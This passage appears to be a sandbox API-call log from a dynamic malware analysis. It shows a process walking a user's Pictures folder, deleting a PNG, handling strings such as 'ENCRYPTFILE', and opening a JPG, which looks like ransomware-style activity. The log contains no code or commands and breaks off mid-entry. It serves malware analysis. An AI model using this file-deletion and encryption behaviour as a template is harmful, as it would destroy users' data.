GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\X0f8JSrsqtdBsB.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\x0f8jsrsqtdbsb.png")) returned 0x20 [0095.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0095.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0095.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0095.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0095.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0095.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0095.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0095.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0095.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0095.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0095.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0095.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0095.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0095.186] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\X0f8JSrsqtdBsB.png", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38d69400, ftCreationTime.dwHighDateTime=0x1d5ee87, ftLastAccessTime.dwLowDateTime=0xcb7e1b10, ftLastAccessTime.dwHighDateTime=0x1d5efeb, ftLastWriteTime.dwLowDateTime=0xcb7e1b10, ftLastWriteTime.dwHighDateTime=0x1d5efeb, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="X0f8JSrsqtdBsB.png", cAlternateFileName="X0F8JS~1.PNG")) returned 0x41ac2c0 [0095.186] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\X0f8JSrsqtdBsB.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\x0f8jsrsqtdbsb.png")) returned 1 [0095.230] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38d69400, ftCreationTime.dwHighDateTime=0x1d5ee87, ftLastAccessTime.dwLowDateTime=0xcb7e1b10, ftLastAccessTime.dwHighDateTime=0x1d5efeb, ftLastWriteTime.dwLowDateTime=0xcb7e1b10, ftLastWriteTime.dwHighDateTime=0x1d5efeb, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="X0f8JSrsqtdBsB.png", cAlternateFileName="X0F8JS~1.PNG")) returned 0 [0095.231] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0095.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0095.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0095.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0095.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0095.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0095.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0095.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0095.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0095.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0095.231] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0095.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0095.231] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0095.232] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0095.232] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0095.232] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0095.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0095.233] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0095.233] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\Z3f-n12Dk_aAtm.jpg", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a8d33d0, ftCreationTime.dwHighDateTime=0x1d5ede1, ftLastAccessTime.dwLowDateTime=0xc1008940, ftLastAccessTime.dwHighDateTime=0x1d5e8ff, ftLastWriteTime.dwLowDateTime=0xc1008940, ftLastWriteTime.dwHighDateTime=0x1d5e8ff, nFileSizeHigh=0x0, nFileSizeLow=0x1089f, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="Z3f-n12Dk_aAtm.jpg", cAlternateFileName="Z3F-N1~1.JPG")) returned 0x41ac040 [0095.233] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0095.233] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0095.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0095.234] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0095.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0095.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.235] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0095.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0095.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0095.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.237] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0095.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0095.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0095.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.237] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0095.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0095.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0095.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0095.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0095.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0095.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0095.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0095.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0095.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0095.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0095.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0095.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0095.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0095.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0095.238] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\Z3f-n12Dk_aAtm.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\z3f-n12dk_aatm.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0095.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0095.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0095.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0095.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0095.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0095.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0095.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0095.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0095.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0095.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0095.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0095.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0095.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0095.240] HeapFree (in: 